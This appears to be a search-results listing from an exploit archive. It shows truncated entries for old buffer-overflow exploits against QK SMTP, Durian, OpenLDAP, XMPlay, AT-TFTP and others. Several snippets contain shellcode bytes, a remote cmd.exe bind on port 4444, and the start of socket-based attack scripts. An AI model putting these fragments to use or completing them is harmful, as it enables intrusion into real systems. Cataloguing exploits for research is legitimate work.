7258 matches found
QK SMTP 3.01 - 'RCPT TO' Remote Buffer Overflow (2)
!/bin/perl https://www.securityfocus.com/bid/20681 tested on winXp Pro SP0 English/winXp Pro SP2 Italian/win 2k SP4 Italian/English return address is universal bind a remote cmd.exe on target host on 4444 port; based on expanders original exploit credit to Greg Linares for discovered the...
csrss.exe double-free vulnerability - arbitrary DWORD overwrite exploit
Hi, For those researchers who are interested in the Csrss Double-Free vulnerability, I have coded an arbitrary DWORD overwrite exploit. This flaw is hard to exploit at least for me due to the "fail-and-die" situation. Corrupting the heap in a process like Csrss is dangerous. However, by...
Hack tell your network "overrun attack" offense and defense record - vulnerability warning - the black bar safety net
As networks have become widespread, a large amount of public shellcode ("overflow" code) and explanations of overflow attack principles can be found on security websites, which has led to a series of security problems: many people who know a little about network security can use ready-made attack software to easily launch an...
durian-302-exec.txt
http://sourceforge.net/projects/durian/ / errorreportingEALL; $address = "192.168.1.3"; $serviceport = "4002"; $shellcode = "\xeb\x1b". "\x5b". "\x31\xc0". "\x50". "\x31\xc0". "\x88\x43\x59". "\x53". "\xbb\x6d\x13\x86\x7c". //WinExec, 0x7c86136d "\xff\xd3". "\x31\xc0". "\x50"...
Durian Web Application Server 3.02 - Remote Buffer Overflow
http://sourceforge.net/projects/durian/ / errorreportingEALL; $address = "192.168.1.3"; $serviceport = "4002"; $shellcode = "\xeb\x1b". "\x5b". "\x31\xc0". "\x50". "\x31\xc0". "\x88\x43\x59". "\x53". "\xbb\x6d\x13\x86\x7c". //WinExec, 0x7c86136d "\xff\xd3". "\x31\xc0". "\x50"...
MS06-057 Microsoft Internet Explorer WebViewFolderIcon setSlice() Overflow
This module exploits a flaw in the WebViewFolderIcon ActiveX control included with Windows 2000, Windows XP, and Windows 2003. This flaw was published during the Month of Browser Bugs project MoBB 18. This module requires Metasploit: https://metasploit.com/download Current source:...
OpenLDAP <= 2.4.3 (KBIND) Remote Buffer Overflow Exploit
No description provided by source. / openldap-kbind-p00f.c - OpenLDAP kbind remote exploit Only works on servers compiled with --enable-kbind enable LDAPv2+ Kerberos IV bind deprecated no by Solar Eclipse [email protected] Shoutouts to LSD for their l33t asm code and to all 0dd people...
OpenLDAP 2.4.3 - 'KBIND' Remote Buffer Overflow
/ openldap-kbind-p00f.c - OpenLDAP kbind remote exploit Only works on servers compiled with --enable-kbind enable LDAPv2+ Kerberos IV bind deprecated no by Solar Eclipse Shoutouts to LSD for their l33t asm code and to all 0dd people Private 0dd code. / include include include include include...
OpenLDAP 2.4.3 - KBIND Remote Buffer Overflow
OpenLDAP 2.4.3 - KBIND Remote Buffer Overflow / openldap-kbind-p00f.c - OpenLDAP kbind remote exploit Only works on servers compiled with --enable-kbind enable LDAPv2+ Kerberos IV bind deprecated no by Solar Eclipse Shoutouts to LSD for their l33t asm code and to all 0dd people Private 0dd code. ...
WAB Files (CVE-2006-2386)
Windows Address Book WAB is a component of Microsoft Windows operating systems that lets users keep a single list of contacts that can be shared by multiple programs. It is most commonly used by Microsoft Outlook Express. The vulnerability is due to a buffer overflow error in the Windows Address...
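AtomixMP3 M3U/PLS Playlist Parsing Buffer Overflow Vulnerability
AtomixMP3 is audio-mixing software for PCs that can mix two songs together. AtomixMP3 has a buffer overflow vulnerability when processing malformed M3U and PLS files; a remote attacker may exploit this vulnerability to execute arbitrary instructions on the user's machine. A stack overflow exists when AtomixMP3 parses M3U and PLS playlist files containing an overly long filename (greater than 520 bytes). If a user is tricked into loading a malicious playlist file, the vulnerability is triggered, leading to execution of arbitrary instructions. AtomixMP3 AtomixMP3 2.3 AtomixMP3 --------- The vendor has not yet provided a patch or upgrade; we recommend that users of this software watch the vendor's home page for the latest version:...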
AT-TFTP <= 1.9 (Long Filename) Remote Buffer Overflow Exploit
No description provided by source. !/usr/bin/perl -w acaroatjervus.it http://www.securityfocus.com/bid/21320 [email protected] is credited with the discovery of this vulnerability use IO::Socket; if!$ARGV1 print "Uso: atftp-19.pl victim port\n\n"; exit; $victim = IO::Socket::INET-newProto='udp',...
BlazeVideo HDTV Player 2.1 - '.PLF' Local Buffer Overflow
/ ======================================================================== 0-day BlazeVideo HDTV Player 30 days of Media Player Exploits by Greg Linares Discovered and Reported By: Greg Linares [email protected] Reported Exploit Date: 12/1/2006 / include include include int mainint argc, ch...
XMPlay 3.3.0.4 .ASX Filename Buffer Overflow Exploit
No description provided by source. / =================================================================== 0-day XMPlay 3.3.0.4 .ASX Filename Buffer Overflow Exploit =================================================================== XMPlay 3.3.0.4 and lower experience a stack-based buffer overflow...
xmplay-1.txt
/ =================================================================== 0-day XMPlay 3.3.0.4 .M3U Filename Buffer Overflow Exploit =================================================================== XMPlay 3.3.0.4 and lower experience a stack-based buffer overflow when loading malformed M3U files...
XMPlay <= 3.3.0.4 (PLS) Local/Remote Buffer Overflow Exploit
No description provided by source. / =================================================================== 0-day XMPlay 3.3.0.4 .PLS Filename Buffer Overflow Exploit =================================================================== XMPlay 3.3.0.4 and lower experience a stack-based buffer overflow...
XMPlay 3.3.0.4 - .PLS Local Buffer Overflow
XMPlay 3.3.0.4 - .PLS Local Buffer Overflow / =================================================================== 0-day XMPlay 3.3.0.4 .PLS Filename Buffer Overflow Exploit =================================================================== XMPlay 3.3.0.4 and lower experience a stack-based buffer...
linux/x86 execve read shellcode - 92 bytes
No description provided by source. XCHG Research Group Linux/x86 execve read shellcode - 92 bytes -- Written by 0ut0fbound -- - http://outofbound.host.sk - http://xchglabs.host.sk .text .globl start start: EAX = 0x04 - syscall write xorl %eax, %eax movb $0x4, %al xorl %ebx, %ebx inc %ebx pushl...
XMPlay 3.3.0.4 - .ASX Filename Local Buffer Overflow
XMPlay 3.3.0.4 - .ASX Filename Local Buffer Overflow / =================================================================== 0-day XMPlay 3.3.0.4 .ASX Filename Buffer Overflow Exploit =================================================================== XMPlay 3.3.0.4 and lower experience a stack-bas...
XMPlay 3.3.0.4 - '.ASX' Filename Local Buffer Overflow
/ =================================================================== 0-day XMPlay 3.3.0.4 .ASX Filename Buffer Overflow Exploit =================================================================== XMPlay 3.3.0.4 and lower experience a stack-based buffer overflow when loading malformed .ASX files...